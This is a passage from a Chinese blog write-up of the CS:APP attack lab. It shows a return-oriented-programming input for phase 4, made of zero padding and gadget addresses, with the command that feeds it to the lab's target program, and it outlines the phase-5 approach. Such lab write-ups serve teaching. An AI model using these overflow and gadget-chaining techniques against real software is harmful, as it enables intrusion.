<li>getbuf的缓冲区<br>因此，我们的输入应该是<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br>ab <span class="hljs-number">19</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br>fa <span class="hljs-number">97</span> b9 <span class="hljs-number">59</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br>a2 <span class="hljs-number">19</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br>ec <span class="hljs-number">17</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br></code></pre></td></tr></table></figure>
运行测试程序<code>./hex2raw &lt;touch4.txt | ./rtarget -q</code>，发现成功<br>有个注意点，那就是我们放在栈里面的基本都是地址，虽然写起来只写了几个字节，但是完整的地址应该是八个字节的，因此构造输入的时候是需要补0的。</li>
</ol>
<h1 id="phase5"><a href="#phase5" class="headerlink" title="phase5"></a>phase5</h1><p>第五个需要的原理和第四个差不多，要完成的效果和第三个phase差不多。<br>关键在于栈的地址不可控，因此需要在程序中去取rsp的值，然后把字符串存在一个距离rsp固定的地方<br><a target="_blank" rel="noopener" href="https://www.zhihu.com/column/c_1458204480777273344">大佬链接</a>这位大佬写的挺好的<br>注意了，ret指令，是从栈中弹出一个地址，然后去执行这个地址！</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CSAPP/" class="category-chain-item">CSAPP</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CSAPP/" class="print-no-link">#CSAPP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>csapp_lab3</div>
      <div>http://example.com/2023/07/30/csapp-lab3/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Cao Dong</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/01/csapp-lab4/" title="csapp_lab4">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">csapp_lab4</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/29/csapp-lab2/" title="csapp_lab2">
                        <span class="hidden-mobile">csapp_lab2</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
